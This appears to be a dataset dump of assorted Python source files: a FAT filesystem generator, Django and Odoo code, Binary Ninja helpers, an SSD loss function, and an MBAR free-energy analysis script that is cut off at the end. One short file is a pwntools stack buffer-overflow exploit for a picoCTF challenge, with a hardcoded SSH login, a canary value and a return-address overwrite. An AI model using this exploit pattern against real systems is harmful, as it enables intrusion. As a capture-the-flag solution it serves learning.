text string | size int64 | token_count int64 |
|---|---|---|
# SPDX-FileCopyrightText: 2021 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import os
from typing import List, Optional, Tuple
from .entry import Entry
from .exceptions import FatalError, WriteDirectoryException
from .fat import FAT, Cluster
from .fatfs_state import FATFSState
from .utils import required_clusters_count, split_content_into_sectors, split_to_name_and_extension
class File:
"""
The class File provides API to write into the files. It represents file in the FS.
"""
ATTR_ARCHIVE = 0x20
ENTITY_TYPE = ATTR_ARCHIVE
def __init__(self, name: str, fat: FAT, fatfs_state: FATFSState, entry: Entry, extension: str = '') -> None:
self.name = name
self.extension = extension
self.fatfs_state = fatfs_state
self.fat = fat
self.size = 0
self._first_cluster = None
self._entry = entry
@property
def entry(self) -> Entry:
return self._entry
@property
def first_cluster(self) -> Optional[Cluster]:
return self._first_cluster
@first_cluster.setter
def first_cluster(self, value: Cluster) -> None:
self._first_cluster = value
def name_equals(self, name: str, extension: str) -> bool:
return self.name == name and self.extension == extension
def write(self, content: str) -> None:
self.entry.update_content_size(len(content))
# we assume that the correct amount of clusters is allocated
current_cluster = self._first_cluster
for content_part in split_content_into_sectors(content, self.fatfs_state.sector_size):
content_as_list = content_part.encode()
if current_cluster is None:
raise FatalError('No free space left!')
address = current_cluster.cluster_data_address
self.fatfs_state.binary_image[address: address + len(content_part)] = content_as_list
current_cluster = current_cluster.next_cluster
class Directory:
"""
The Directory class provides API to add files and directories into the directory
and to find the file according to path and write it.
"""
ATTR_DIRECTORY = 0x10
ATTR_ARCHIVE = 0x20
ENTITY_TYPE = ATTR_DIRECTORY
def __init__(self,
name,
fat,
fatfs_state,
entry=None,
cluster=None,
size=None,
extension='',
parent=None):
# type: (str, FAT, FATFSState, Optional[Entry], Cluster, Optional[int], str, Directory) -> None
self.name = name
self.fatfs_state = fatfs_state
self.extension = extension
self.fat = fat
self.size = size or self.fatfs_state.sector_size
# if directory is root its parent is itself
self.parent: Directory = parent or self
self._first_cluster = cluster
# entries will be initialized after the cluster allocation
self.entries: List[Entry] = []
self.entities = [] # type: ignore
self._entry = entry # currently not in use (will use later for e.g. modification time, etc.)
@property
def is_root(self) -> bool:
return self.parent is self
@property
def first_cluster(self) -> Cluster:
return self._first_cluster
@first_cluster.setter
def first_cluster(self, value: Cluster) -> None:
self._first_cluster = value
def name_equals(self, name: str, extension: str) -> bool:
return self.name == name and self.extension == extension
def create_entries(self, cluster: Cluster) -> list:
return [Entry(entry_id=i,
parent_dir_entries_address=cluster.cluster_data_address,
fatfs_state=self.fatfs_state)
for i in range(self.size // self.fatfs_state.entry_size)]
def init_directory(self) -> None:
self.entries = self.create_entries(self._first_cluster)
if not self.is_root:
# the root directory doesn't contain link to itself nor the parent
free_entry1 = self.find_free_entry() or self.chain_directory()
free_entry1.allocate_entry(first_cluster_id=self.first_cluster.id,
entity_name='.',
entity_extension='',
entity_type=self.ENTITY_TYPE)
self.first_cluster = self._first_cluster
free_entry2 = self.find_free_entry() or self.chain_directory()
free_entry2.allocate_entry(first_cluster_id=self.parent.first_cluster.id,
entity_name='..',
entity_extension='',
entity_type=self.parent.ENTITY_TYPE)
self.parent.first_cluster = self.parent.first_cluster
def lookup_entity(self, object_name: str, extension: str): # type: ignore
for entity in self.entities:
if entity.name == object_name and entity.extension == extension:
return entity
return None
def recursive_search(self, path_as_list, current_dir): # type: ignore
name, extension = split_to_name_and_extension(path_as_list[0])
next_obj = current_dir.lookup_entity(name, extension)
if next_obj is None:
raise FileNotFoundError('No such file or directory!')
if len(path_as_list) == 1 and next_obj.name_equals(name, extension):
return next_obj
return self.recursive_search(path_as_list[1:], next_obj)
def find_free_entry(self) -> Optional[Entry]:
for entry in self.entries:
if entry.is_empty:
return entry
return None
def _extend_directory(self) -> None:
current = self.first_cluster
while current.next_cluster is not None:
current = current.next_cluster
new_cluster = self.fat.find_free_cluster()
current.set_in_fat(new_cluster.id)
current.next_cluster = new_cluster
self.entries += self.create_entries(new_cluster)
def chain_directory(self) -> Entry:
self._extend_directory()
free_entry = self.find_free_entry()
if free_entry is None:
raise FatalError('No more space left!')
return free_entry
def allocate_object(self,
name,
entity_type,
path_from_root=None,
extension=''):
# type: (str, int, Optional[List[str]], str) -> Tuple[Cluster, Entry, Directory]
"""
Method finds the target directory in the path
and allocates cluster (both the record in FAT and cluster in the data region)
and entry in the specified directory
"""
free_cluster = self.fat.find_free_cluster()
target_dir = self if not path_from_root else self.recursive_search(path_from_root, self)
free_entry = target_dir.find_free_entry() or target_dir.chain_directory()
free_entry.allocate_entry(first_cluster_id=free_cluster.id,
entity_name=name,
entity_extension=extension,
entity_type=entity_type)
return free_cluster, free_entry, target_dir
def new_file(self, name: str, extension: str, path_from_root: Optional[List[str]]) -> None:
free_cluster, free_entry, target_dir = self.allocate_object(name=name,
extension=extension,
entity_type=Directory.ATTR_ARCHIVE,
path_from_root=path_from_root)
file = File(name, fat=self.fat, extension=extension, fatfs_state=self.fatfs_state, entry=free_entry)
file.first_cluster = free_cluster
target_dir.entities.append(file)
def new_directory(self, name, parent, path_from_root):
# type: (str, Directory, Optional[List[str]]) -> None
free_cluster, free_entry, target_dir = self.allocate_object(name=name,
entity_type=Directory.ATTR_DIRECTORY,
path_from_root=path_from_root)
directory = Directory(name=name, fat=self.fat, parent=parent, fatfs_state=self.fatfs_state, entry=free_entry)
directory.first_cluster = free_cluster
directory.init_directory()
target_dir.entities.append(directory)
def write_to_file(self, path: List[str], content: str) -> None:
"""
Writes to file existing in the directory structure.
:param path: path split into the list
:param content: content as a string to be written into a file
:returns: None
:raises WriteDirectoryException: raised is the target object for writing is a directory
"""
entity_to_write = self.recursive_search(path, self)
if isinstance(entity_to_write, File):
clusters_cnt = required_clusters_count(cluster_size=self.fatfs_state.sector_size, content=content)
self.fat.allocate_chain(entity_to_write.first_cluster, clusters_cnt)
entity_to_write.write(content)
else:
raise WriteDirectoryException(f'`{os.path.join(*path)}` is a directory!')
| 9,531 | 2,623 |
# Generated by Django 2.0 on 2018-03-07 12:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('titanic', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='passenger',
name='name',
field=models.CharField(default='', max_length=200),
),
]
| 385 | 131 |
# Copyright 2020 Akretion (http://www.akretion.com).
# @author Sébastien BEAU <sebastien.beau@akretion.com>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from collections import defaultdict
from dateutil.relativedelta import relativedelta
from odoo import _, fields, models
from odoo.exceptions import UserError
from odoo.osv import expression
# Concept
# open_slot is the range of time where the ressource can be book
# available_slot is the range of time where the ressource is available for booking
# booked_slot is a slot already booked
# bookable_slot is a slot (with a size if slot_duration) that fit into
# an available slot
class BookableMixin(models.AbstractModel):
_name = "bookable.mixin"
_description = "Bookable Mixin"
slot_duration = fields.Float()
slot_capacity = fields.Integer()
def _get_slot_duration(self):
return self.slot_duration
def _get_slot_capacity(self):
return self.slot_capacity
def _get_booked_slot(self, start, stop):
domain = self._get_domain(start, stop)
return self.env["calendar.event"].search(
expression.AND([domain, [("booking_type", "=", "booked")]])
)
def _build_timeline_load(self, start, stop):
timeline = defaultdict(int)
timeline.update({start: 0, stop: 0})
for booked_slot in self._get_booked_slot(start, stop):
if booked_slot.start < start:
timeline[start] += 1
else:
timeline[booked_slot.start] += 1
if booked_slot.stop < stop:
timeline[booked_slot.stop] -= 1
timeline = list(timeline.items())
timeline.sort()
return timeline
def _get_available_slot(self, start, stop):
load_timeline = self._build_timeline_load(start, stop)
load = 0
slots = []
slot = None
capacity = self._get_slot_capacity()
for dt, load_delta in load_timeline:
load += load_delta
if not slot and load < capacity:
slot = [dt, None]
slots.append(slot)
else:
slot[1] = dt
if load >= capacity:
slot = None
return slots
def _prepare_bookable_slot(self, open_slot, start, stop):
# If need you can inject extra information from the open_slot
return {"start": start, "stop": stop}
def _build_bookable_slot(self, open_slot, start, stop):
bookable_slots = []
# now we have to care about datetime vs string
delta = self._get_slot_duration()
while True:
slot_stop = start + relativedelta(minutes=delta)
if slot_stop > stop:
break
bookable_slots.append(
self._prepare_bookable_slot(open_slot, start, slot_stop)
)
start += relativedelta(minutes=delta)
return bookable_slots
def get_open_slot(self, start, stop):
domain = self._get_domain(start, stop)
domain = expression.AND([domain, [("booking_type", "=", "bookable")]])
return self.env["calendar.event"].search(domain, order="start_date")
def get_bookable_slot(self, start, stop):
start = fields.Datetime.to_datetime(start)
stop = fields.Datetime.to_datetime(stop)
slots = []
for open_slot in self.get_open_slot(start, stop):
for slot_start, slot_stop in self._get_available_slot(
max(open_slot.start, start), min(open_slot.stop, stop)
):
slots += self._build_bookable_slot(open_slot, slot_start, slot_stop)
return slots
def _get_domain_for_current_object(self):
return [
("res_model", "=", self._name),
("res_id", "=", self.id),
]
def _get_domain(self, start, stop):
# be carefull we need to search for every slot (bookable and booked)
# that exist in the range start/stop
# This mean that we need the slot
# - started before and finishing in the range
# - started and finished in the range
# - started in the range and fisnish after
# In an other expression it's
# - all slot that start in the range
# - all slot that finish in the range
domain = self._get_domain_for_current_object()
return expression.AND(
[
domain,
[
"|",
"&",
("start", ">=", start),
("start", "<", stop),
"&",
("stop", ">", start),
("stop", "<=", stop),
],
]
)
def _check_load(self, start, stop):
load_timeline = self._build_timeline_load(start, stop)
capacity = self._get_slot_capacity()
load = 0
for _dt, load_delta in load_timeline:
load += load_delta
if load > capacity:
raise UserError(_("The slot is not available anymore"))
def _prepare_booked_slot(self, vals):
vals.update(
{
"res_model_id": self.env["ir.model"]
.search([("model", "=", self._name)])
.id,
"res_id": self.id,
"booking_type": "booked",
"start": fields.Datetime.to_datetime(vals["start"]),
"stop": fields.Datetime.to_datetime(vals["stop"]),
}
)
return vals
def _check_duration(self, start, stop):
duration = (stop - start).total_seconds() / 60.0
if duration != self._get_slot_duration():
raise UserError(_("The slot duration is not valid"))
def _check_on_open_slot(self, start, stop):
domain = self._get_domain_for_current_object()
domain = expression.AND(
[
domain,
[
("start", "<=", start),
("stop", ">=", stop),
],
]
)
open_slot = self.env["calendar.event"].search(domain)
if not open_slot:
raise UserError(_("The slot is not on a bookable zone"))
def book_slot(self, vals):
self.ensure_one()
vals = self._prepare_booked_slot(vals)
self._check_on_open_slot(vals["start"], vals["stop"])
self._check_duration(vals["start"], vals["stop"])
slot = self.env["calendar.event"].create(vals)
self._check_load(vals["start"], vals["stop"])
return slot
| 6,625 | 1,970 |
from binaryninja import InstructionTextToken
from binaryninja.enums import InstructionTextTokenType
__all__ = ['fmt_dec', 'fmt_dec_sign',
'fmt_hex', 'fmt_hex2', 'fmt_hex4', 'fmt_hexW', 'fmt_hex_sign']
__all__ += ['fmt_imm', 'fmt_imm_sign', 'fmt_disp', 'fmt_code_rel', 'fmt_code_abs']
__all__ += ['token', 'asm']
def fmt_dec(value):
return "{:d}".format(value)
def fmt_dec_sign(value):
return "{:+d}".format(value)
def fmt_hex(value):
return "{:#x}".format(value)
def fmt_hex2(value):
return "{:#02x}".format(value)
def fmt_hex4(value):
return "{:#04x}".format(value)
def fmt_hexW(value, width):
if width == 1:
return fmt_hex2(value)
elif width == 2:
return fmt_hex4(value)
else:
raise ValueError('Invalid width {}'.format(width))
def fmt_hex_sign(value):
return "{:+#x}".format(value)
def fmt_imm(value):
if value < 256:
return fmt_dec(value)
else:
return fmt_hex(value)
def fmt_imm_sign(value):
if abs(value) < 256:
return fmt_dec_sign(value)
else:
return fmt_hex_sign(value)
def fmt_disp(value):
return fmt_hex(value)
def fmt_code_abs(value):
return fmt_hex4(value)
def fmt_code_rel(value):
return fmt_hex_sign(value)
def token(kind, text, *data):
if kind == 'opcode':
tokenType = InstructionTextTokenType.OpcodeToken
elif kind == 'opsep':
tokenType = InstructionTextTokenType.OperandSeparatorToken
elif kind == 'instr':
tokenType = InstructionTextTokenType.InstructionToken
elif kind == 'text':
tokenType = InstructionTextTokenType.TextToken
elif kind == 'reg':
tokenType = InstructionTextTokenType.RegisterToken
elif kind == 'int':
tokenType = InstructionTextTokenType.IntegerToken
elif kind == 'addr':
tokenType = InstructionTextTokenType.PossibleAddressToken
elif kind == 'codeRelAddr':
tokenType = InstructionTextTokenType.CodeRelativeAddressToken
elif kind == 'beginMem':
tokenType = InstructionTextTokenType.BeginMemoryOperandToken
elif kind == 'endMem':
tokenType = InstructionTextTokenType.EndMemoryOperandToken
else:
raise ValueError('Invalid token kind {}'.format(kind))
return InstructionTextToken(tokenType, text, *data)
def asm(*parts):
tokens = []
for part in parts:
tokens.append(token(*part))
return tokens
| 2,432 | 800 |
# -*- coding: utf-8 -*-
"""Top-level package for beerlists."""
__author__ = """David Todd"""
__email__ = 'dmofot@gmail.com'
__version__ = '0.9.0'
| 148 | 66 |
# -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from data import coco as cfg
from ..box_utils import match, log_sum_exp, decode, nms
class PrecisionLoss(nn.Module):
"""SSD Weighted Loss Function
Compute Targets:
1) Produce Confidence Target Indices by matching ground truth boxes
with (default) 'priorboxes' that have jaccard index > threshold parameter
(default threshold: 0.5).
2) Produce localization target by 'encoding' variance into offsets of ground
truth boxes and their matched 'priorboxes'.
3) Hard negative mining to filter the excessive number of negative examples
that comes with using a large number of default bounding boxes.
(default negative:positive ratio 3:1)
Objective Loss:
L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss
weighted by α which is set to 1 by cross val.
Args:
c: class confidences,
l: predicted boxes,
g: ground truth boxes
N: number of matched default boxes
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
"""
def __init__(self, num_classes, overlap_thresh, prior_for_matching,
bkg_label, top_k, encode_target, nms_thresh, conf_thresh,
use_gpu=True):
super(PrecisionLoss, self).__init__()
self.use_gpu = use_gpu
self.num_classes = num_classes
self.threshold = overlap_thresh
self.background_label = bkg_label
self.encode_target = encode_target
self.use_prior_for_matching = prior_for_matching
self.variance = cfg['variance']
self.top_k = top_k
if nms_thresh <= 0:
raise ValueError('nms_threshold must be non negative.')
self.nms_thresh = nms_thresh
self.softmax = nn.Softmax(dim=-1)
self.conf_thresh = conf_thresh
def forward(self, predictions, targets):
"""Multibox Loss
Args:
predictions (tuple): A tuple containing loc preds, conf preds,
and prior boxes from SSD net.
conf shape: torch.size(batch_size,num_priors,num_classes)
loc shape: torch.size(batch_size,num_priors,4)
priors shape: torch.size(num_priors,4)
targets (tensor): Ground truth boxes and labels for a batch,
shape: [batch_size,num_objs,5] (last idx is the label).
"""
loc_data, conf_data, priors = predictions
# torch.save(loc_data, 'inter/loc_data.pt')
# torch.save(conf_data, 'inter/conf_data.pt')
# torch.save(priors, 'inter/priors.pt')
# torch.save(targets, 'inter/targets.pt')
num = loc_data.size(0)
priors = priors[:loc_data.size(1), :]
# confused here, why stuck at loc_data size 1
num_priors = (priors.size(0))
# prior_data = priors.view(1, num_priors, 4)
# print(prior_data.size())
num_classes = self.num_classes
# match priors (default boxes) and ground truth boxes
loc_t = torch.Tensor(num, num_priors, 4)
# [num, num_priors, 4]
conf_t = torch.LongTensor(num, num_priors)
# [num_priors] top class label for each prior
for idx in range(num):
truths = targets[idx][:, :-1].data
labels = targets[idx][:, -1].data
defaults = priors.data
match(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
if self.use_gpu:
loc_t = loc_t.cuda()
conf_t = conf_t.cuda()
# wrap targets
loc_t = Variable(loc_t, requires_grad=False)
conf_t = Variable(conf_t, requires_grad=False)
conf_preds = self.softmax(conf_data.view(num, num_priors,
self.num_classes))
# print(conf_preds.max()) 0.98
conf_preds_trans = conf_preds.transpose(2,1)
# [num, num_classes, num_priors]
conf_p = torch.zeros(num, num_priors, num_classes).cuda()
# [num, num_priors, num_classes]
loc_p = torch.zeros(num, num_priors, 4).cuda()
# Decode predictions into bboxes
for i in range(num):
decoded_boxes = decode(loc_data[i], priors, self.variance)
# For each class, perform nms
conf_scores = conf_preds_trans[i].clone()
for cl in range(1, self.num_classes):
c_mask = conf_scores[cl].gt(self.conf_thresh)
scores = conf_scores[cl][c_mask]
if scores.size(0) == 0:
continue
# fliter low conf predictions
l_mask = c_mask.unsqueeze(1).expand_as(decoded_boxes)
boxes = Variable(decoded_boxes[l_mask].view(-1, 4), requires_grad=False)
# idx of highest scoring and non-overlapping boxes per class
# boxes [num_priors(has been flitered), 4] location preds for i'th image
ids, count = nms(boxes, scores, self.nms_thresh, self.top_k)
conf_p[i, c_mask, cl] = conf_preds[i, c_mask, cl] # [num, num_priors, num_classes]
loc_p[i, l_mask[:,0].nonzero()[ids][:count]] = loc_data[i, l_mask[:,0].nonzero()[ids][:count]] # [num, num_priors, 4]
# check each result if match the ground truth
effect_conf = conf_p.sum(2) != 0
effect_conf_idx = effect_conf.unsqueeze(2).expand_as(conf_p)
effect_loc_idx = effect_conf.unsqueeze(2).expand_as(loc_t)
# [num, num_priors, num_classes] binary metric, thousands will be True in million
# torch.save(conf_preds, 'inter/conf_preds.pt')
# torch.save(effect_conf, 'inter/effect_conf.pt')
# torch.save(effect_loc, 'inter/effect_loc.pt')
# torch.save(conf_p, 'inter/conf_p.pt')
# torch.save(conf_t, 'inter/conf_t.pt')
# torch.save(effect_conf, 'inter/effect_conf.pt')
loss_c = F.cross_entropy(conf_p[effect_conf_idx].view(-1, num_classes), conf_t[effect_conf].view(-1), size_average=False)
loss_l = F.smooth_l1_loss(loc_p[effect_loc_idx], loc_t[effect_loc_idx], size_average=False)
# conf_p [num*num_p, num_classes] conf_t [num*num_p, 1(label)]
N = effect_conf_idx.data.sum()
loss_l /= N.float()
loss_c /= N.float()
return loss_l, loss_c
| 6,551 | 2,176 |
#!/usr/bin/env python
from pwn import *
debug = 0
user = 'mitsububunu'
pw = 'password'
if debug:
p = process('./vuln')
else:
s = ssh(host = '2018shell.picoctf.com', user=user, password=pw)
s.set_working_directory('/problems/buffer-overflow-3_1_2e6726e5326a80f8f5a9c350284e6c7f')
p = s.process('./vuln')
binary = ELF('./vuln')
canary = '4xV,'
print p.recvuntil('>')
p.sendline('300')
print p.recvuntil('>')
p.sendline('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + canary + 'AAAABBBBCCCCDDDD' + p32(binary.symbols['win']))
print p.recvall() | 545 | 261 |
from .reports import (
IndividualResponseStats,
ResponseList,
DevicesReport,
OptInList,
OptOutList,
PushList,
ResponseReportList,
AppOpensList,
TimeInAppList,
)
| 197 | 66 |
# Example illustrating the application of MBAR to compute a 1D PMF from an umbrella sampling simulation.
#
# The data represents an umbrella sampling simulation for the magnetization of the Ising model
# Adapted from one of the pymbar example scripts for 1D PMFs
import numpy as np # numerical array library
import pymbar # multistate Bennett acceptance ratio
import os
from pymbar import timeseries # timeseries analysis
from pymbar.utils import logsumexp
from glob import glob
from matplotlib.ticker import AutoMinorLocator
from scipy.optimize import brentq
import scipy.signal as signal
from scipy.signal import savgol_filter
kB = 1.0 # Boltzmann constant
# Parameters
temperature = 3.0 # assume a single temperature -- can be overridden with data from param file
N_max = 50000 # maximum number of snapshots/simulation
N_max_ref = 50000 # maximum number of snapshots/simulation
folders_top = glob("*/") # total number of temperatures
folders_1 = []
curdir = os.getcwd()
for i in range(len(folders_top)):
os.chdir(curdir+'/'+folders_top[i])
folders_bottom = glob("*/")
for j in range(len(folders_bottom)):
os.chdir(curdir+'/'+folders_top[i]+'/'+folders_bottom[j])
folders_1.append(os.getcwd())
os.chdir(curdir)
K = len(folders_1)
T_k = np.ones(K,float)*temperature # inital temperatures are all equal
beta = 1.0 / (kB * temperature) # inverse temperature of simulations
mag_min = -1580 # min for magnetization
mag_max = 1580 # max for magnetization
mag_nbins = 395 # number of bins for magnetization
# Need to delete ext terms
# Allocate storage for simulation data
N_max = 50000
N_k = np.zeros([K], np.int32) # N_k[k] is the number of snapshots from umbrella simulation k
K_k = np.zeros([K], np.float64) # K_1_k[k] is the spring constant 1 for umbrella simulation k
mu_k = np.zeros([K], np.float64) # mu_k[k] is the chemical potential for umbrella simulation k
mag0_k = np.zeros([K], np.float64) # mag0_k[k] is the spring center location for umbrella simulation k
mag_kn = np.zeros([K,N_max], np.float64) # mag_kn[k,n] is the magnetization for snapshot n from umbrella simulation k
u_kn = np.zeros([K,N_max], np.float64) # u_kn[k,n] is the reduced potential energy without umbrella restraints of snapshot n of umbrella simulation k
g_k = np.zeros([K],np.float32);
# Read in umbrella spring constants and centers.
# Go through directories and read
umbrella_index = 0
for i in range(K):
infile = open(folders_1[i]+'/param')
for line in infile:
line_strip = line.strip()
if line_strip.startswith('harmon'):
print(line_strip)
line_split = line_strip.split()[1]
K_k[i] = float(line_split)
if line_strip.startswith('window'):
print(line_strip)
line_split = line_strip.split()[1]
mag0_k[i] = float(line_split)
if line_strip.startswith('T'):
print(line_strip)
line_split = line_strip.split()[1]
T_k[i] = float(line_split)
if line_strip.startswith('h_external'):
print(line_strip)
line_split = line_strip.split()[1]
mu_k[i] = float(line_split)
beta_k = 1.0/(kB*T_k) # beta factor for the different temperatures
print(beta_k)
print(mu_k)
if (np.min(T_k) == np.max(T_k)):
DifferentTemperatures = False # if all the temperatures are the same, then we don't have to read in energies.
# Read the simulation data
for i in range(K):
k = i
string_base = folders_1[i]
# Read magnetization data.
filename_mag = string_base+'/mbar_data.txt'
print("Reading %s..." % filename_mag)
infile = open(filename_mag, 'r')
lines = infile.readlines()
infile.close()
# Parse data.
n = 0
for line in lines:
tokens = line.split()
mag = float(tokens[2]) # Magnetization
u_kn[k,n] = float(tokens[1]) - float(tokens[0]) + mu_k[k]*mag # reduced potential energy without umbrella restraint and external field
mag_kn[k,n] = mag
n += 1
N_k[k] = n
# Compute correlation times for potential energy and magnetization
# timeseries. If the temperatures differ, use energies to determine samples; otherwise, magnetization
g_k[k] = timeseries.statisticalInefficiency(mag_kn[k,0:N_k[k]])
print("Correlation time for set %5d is %10.3f" % (k,g_k[k]))
indices = timeseries.subsampleCorrelatedData(mag_kn[k,0:N_k[k]], g=g_k[k])
# Subsample data.
N_k[k] = len(indices)
u_kn[k,0:N_k[k]] = u_kn[k,indices]
mag_kn[k,0:N_k[k]] = mag_kn[k,indices]
N_max = np.max(N_k) # shorten the array size
# At this point, start diverting from the usual path and allow a method that allows us to perform blocking/bootstrapping analysis
mag_n = mag_kn[0,0:N_k[0]] # mag_n[k] is the magnetization from some simulation snapshot
u_n = u_kn[0,0:N_k[0]] # u_n[k] is the potential energy from some snapshot that has mag value mag_n[k]
# Now append values
allN = N_k.sum()
for k in range(1,K):
mag_n = np.append(mag_n, mag_kn[k,0:N_k[k]])
u_n = np.append(u_n, u_kn[k,0:N_k[k]])
# Bootstrap time
N_bs = 20 # number of bootstrap samples
N_bs_start = 0 # index to start with outputs
np.random.seed(0)
# Some variable to skip output #
mbar_ref = []
mbar_count = 0
for N_ in range(N_bs_start,N_bs_start+N_bs):
print("Iteration %d" % (N_))
f_bs = open('mbar_'+str(N_)+'.txt', 'w')
print("Iteration %d" % (N_), file=f_bs)
# Select random samples
g_reduction = 50
N_red = np.random.randint(allN, size=allN//g_reduction)
N_red = np.sort(N_red)
N_k_red = np.zeros([K], np.int32)
N_cumsum = np.cumsum(N_k)
N_cumsum = np.hstack((np.array([0]), N_cumsum))
# Determine N_k_red by binning
for i in range(K):
N_bin = (N_cumsum[i] <= N_red[:]) & (N_red[:] < N_cumsum[i+1])
N_k_red[i] = N_bin.sum()
u_n_red = u_n[N_red]
mag_n_red = mag_n[N_red]
u_kn_red = np.zeros((K, allN//g_reduction))
for k in range(K):
# Compute from umbrella center k
dmag = mag_n_red[:] - mag0_k[k]
# Compute energy of samples with respect to umbrella potential k
u_kn_red[k,:] = beta_k[k]*(u_n_red[:] + (K_k[k]/2.0) * (dmag/1575.0)**2 - mu_k[k]*mag_n_red[:])
# Construct magnetization bins
print("Binning data...", file=f_bs)
delta_mag = (mag_max - mag_min) / float(mag_nbins)
# compute bin centers
bin_center_i_mag = np.zeros([mag_nbins], np.float64)
for i in range(mag_nbins):
bin_center_i_mag[i] = mag_min + delta_mag/2 + delta_mag * i
# Bin data
bin_n = np.zeros([allN//g_reduction], np.int64)+mag_nbins+10
nbins = 0
bin_counts = list()
bin_centers = list() # bin_centers[i] is a tuple that gives the center of bin i
for j in range(mag_nbins):
# Determine which configurations lie in this bin
in_bin = (bin_center_i_mag[j]-delta_mag/2 <= mag_n_red[:]) & (mag_n_red[:] < bin_center_i_mag[j]+delta_mag/2)
# Count number of configurations in this bin
bin_count = in_bin.sum()
if (bin_count > 0):
# store bin
bin_centers.append(bin_center_i_mag[j])
bin_counts.append( bin_count )
# assign these conformations to the bin index
bin_n[np.where(in_bin)[0]] = nbins
# increment number of bins
nbins += 1
# Get total number of things that were binned
bin_counts_np = np.array(bin_counts)
bin_count_total = bin_counts_np.sum()
bin_count_ideal = allN
# Make array with total combinations of bin_center_i_mag and bin_center_i_mag
bin_center_possible = np.zeros((mag_nbins,1))
bin_center_empty = np.zeros((mag_nbins,1))
for i in range(mag_nbins):
bin_center_possible[i] = bin_center_i_mag[i]
# Determine empty bins
for i in range(nbins):
for k in range(mag_nbins):
if((bin_centers[i] == bin_center_i_mag[k])):
bin_center_empty[k] = 1
print("%d bins were populated:" % nbins, file=f_bs)
for i in range(nbins):
print("bin %5d (%6.5f) %12d conformations" % (i, bin_centers[i], bin_counts[i]), file=f_bs)
print("%d empty bins" % (mag_nbins-nbins), file=f_bs)
for j in range(mag_nbins):
if(bin_center_empty[j] == 0):
print("bin (%6.5f)" % (bin_center_possible[j]), file=f_bs)
print("%d / %d data used" % (bin_count_total, bin_count_ideal), file=f_bs)
# Initialize MBAR.
print("Running MBAR...", file=f_bs)
if(mbar_count == 0):
mbar = pymbar.MBAR(u_kn_red, N_k_red, verbose = True, relative_tolerance=1e-10)
mbar_ref = mbar.f_k
mbar_count = mbar_count+1
else:
mbar = pymbar.MBAR(u_kn_red, N_k_red, verbose = True, relative_tolerance=1e-10, initial_f_k=mbar_ref)
print('At reweighting step', file=f_bs)
# Now have weights, time to have some fun reweighting
u_n_red_original = u_n_red.copy()
T_targets_low = np.linspace(2.0,3.0,26)
T_targets_high = np.linspace(3.025, 3.7, 28)
T_targets = np.hstack((T_targets_low, T_targets_high))
low_comp_storage = np.zeros(T_targets.shape)
high_comp_storage = np.zeros(T_targets.shape)
mu_1_storage = np.zeros(T_targets.shape)
mu_2_storage = np.zeros(T_targets.shape)
mu_storage = np.zeros(T_targets.shape)
# Compute PMF in unbiased potential (in units of kT) at kT = 1
(f_i, df_i) = mbar.computePMF(u_n_red, bin_n, nbins)
# Show free energy and uncertainty of each occupied bin relative to lowest free energy
print("1D PMF", file=f_bs)
print("", file=f_bs)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_bs)
for i in range(nbins):
print('%8d %10.8e %8d %10.10e %10.10e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_bs)
# Write out PMF to file
f_ = open('free_energy_'+str(mag_nbins)+'_original_'+str(N_)+'.txt', 'w')
print("PMF (in units of kT)", file=f_)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e %16.16e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_)
f_.close()
for j in range(len(T_targets)):
print("Reweighting at temperature "+str(T_targets[j]), file=f_bs)
# reweight to temperature of interest
u_n_red = u_n_red_original.copy()
beta_reweight = 1.0/(kB*T_targets[j]) # beta factor for the different temperatures
u_n_red = beta_reweight*u_n_red
# Compute PMF in unbiased potential (in units of kT) at kT = 1
(f_i_base, df_i_base) = mbar.computePMF(u_n_red, bin_n, nbins)
mu_low = -1.0
mu_high = 1.0
# Now have mu_low and mu_high, use a bounded method to find mu which causes
# f_i(comp_low) \approx f_i(comp_high)
# let's use scipy's minimize_scalar solver for this
# Have to define a function that we want to operate on
def free_diff_comp(mu, f_i_base, bin_centers, beta_reweight):
f_i = f_i_base - beta_reweight*mu*bin_centers
mid_comp = int(3.0*nbins/4.0)
f_i_low_comp = f_i[0:mid_comp].min()
f_i_high_comp = f_i[mid_comp:nbins].min()
return f_i_high_comp-f_i_low_comp
print("", file=f_bs)
print("Finding mu_eq_1", file=f_bs)
# Find minimum
mu_eq_1 = brentq(free_diff_comp, a=mu_low, b=mu_high, args=(f_i_base, np.array(bin_centers), beta_reweight))
mu_1_storage[j] = mu_eq_1
print("mu_eq_1 %17.17e"%(mu_eq_1), file=f_bs)
print("", file=f_bs)
# Now output results
# Reweight to mu_eq
f_i = f_i_base.copy()
f_i = f_i - beta_reweight*mu_eq_1*np.array(bin_centers)
f_i -= f_i.min()
# Show free energy and uncertainty of each occupied bin relative to lowest free energy
print("1D PMF with mu_eq_1", file=f_bs)
print("", file=f_bs)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'f'), file=f_bs)
for i in range(nbins):
print('%8d %10.8g %8d %10.8e' % (i, bin_centers[i], bin_counts[i], f_i[i]), file=f_bs)
f_ = open('mu_eq_1_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("%17.17e"%(mu_eq_1), file=f_)
f_.close()
# Write out PMF to file
f_ = open('pmf_eq_1_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("PMF with mu_eq_1 (in units of kT)", file=f_)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'f'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e' % (i, bin_centers[i], bin_counts[i], f_i[i]), file=f_)
f_.close()
# Write out probability to file
